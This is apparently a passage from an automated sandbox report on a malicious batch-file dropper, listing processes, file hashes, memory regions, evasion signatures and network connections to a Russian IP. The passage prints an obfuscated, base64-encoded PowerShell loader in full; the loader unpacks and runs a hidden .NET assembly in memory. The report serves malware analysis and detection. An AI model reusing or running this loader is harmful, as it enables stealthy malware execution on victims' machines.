AdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\system32\attrib.exe

attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat".exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
RU 89.23.97.206:48135 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
RU 89.23.97.206:48135 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
RU 89.23.97.206:48135 tcp
RU 89.23.97.206:48135 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
RU 89.23.97.206:48135 tcp
RU 89.23.97.206:48135 tcp
RU 89.23.97.206:48135 tcp

Files

C:\Users\Admin\AppData\Local\Temp\New folder\08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

memory/3472-4-0x00000000744CE000-0x00000000744CF000-memory.dmp

memory/3472-5-0x0000000002D00000-0x0000000002D36000-memory.dmp

memory/3472-6-0x00000000744C0000-0x0000000074C70000-memory.dmp

memory/3472-8-0x00000000744C0000-0x0000000074C70000-memory.dmp

memory/3472-7-0x00000000053D0000-0x00000000059F8000-memory.dmp

memory/3472-9-0x0000000005300000-0x0000000005322000-memory.dmp

memory/3472-10-0x0000000005A00000-0x0000000005A66000-memory.dmp

memory/3472-11-0x0000000005A70000-0x0000000005AD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_emmkcsqh.hdo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3472-17-0x0000000005BA0000-0x0000000005EF4000-memory.dmp

memory/3472-22-0x00000000061E0000-0x00000000061FE000-memory.dmp

memory/3472-23-0x0000000006270000-0x00000000062BC000-memory.dmp

memory/3472-25-0x00000000072D0000-0x00000000072EA000-memory.dmp

memory/3472-24-0x0000000007B20000-0x000000000819A000-memory.dmp

memory/3472-26-0x00000000074A0000-0x00000000075E4000-memory.dmp

memory/3472-27-0x0000000007370000-0x0000000007464000-memory.dmp

memory/3472-28-0x00000000076E0000-0x00000000076F4000-memory.dmp

memory/3472-29-0x0000000007700000-0x0000000007792000-memory.dmp

memory/1312-30-0x0000000000400000-0x0000000000428000-memory.dmp

memory/1312-33-0x00000000744C0000-0x0000000074C70000-memory.dmp

memory/1312-34-0x0000000007AC0000-0x00000000080D8000-memory.dmp

memory/1312-35-0x0000000007520000-0x0000000007532000-memory.dmp

memory/1312-36-0x0000000007690000-0x000000000779A000-memory.dmp

memory/1312-37-0x00000000075C0000-0x00000000075FC000-memory.dmp

memory/1312-38-0x00000000744C0000-0x0000000074C70000-memory.dmp

memory/3472-39-0x00000000744C0000-0x0000000074C70000-memory.dmp

memory/1312-40-0x00000000744C0000-0x0000000074C70000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-09 19:11

Reported

2024-11-09 19:14

Platform

win7-20241010-en

Max time kernel

117s

Max time network

118s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"

Signatures

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"

C:\Windows\system32\attrib.exe

attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe

C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe

"C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\system32\attrib.exe

attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/2836-5-0x000007FEF589E000-0x000007FEF589F000-memory.dmp

memory/2836-6-0x000000001B400000-0x000000001B6E2000-memory.dmp

memory/2836-7-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

memory/2836-8-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

memory/2836-9-0x0000000001CB0000-0x0000000001CB8000-memory.dmp

memory/2836-10-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp

memory/2836-11-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp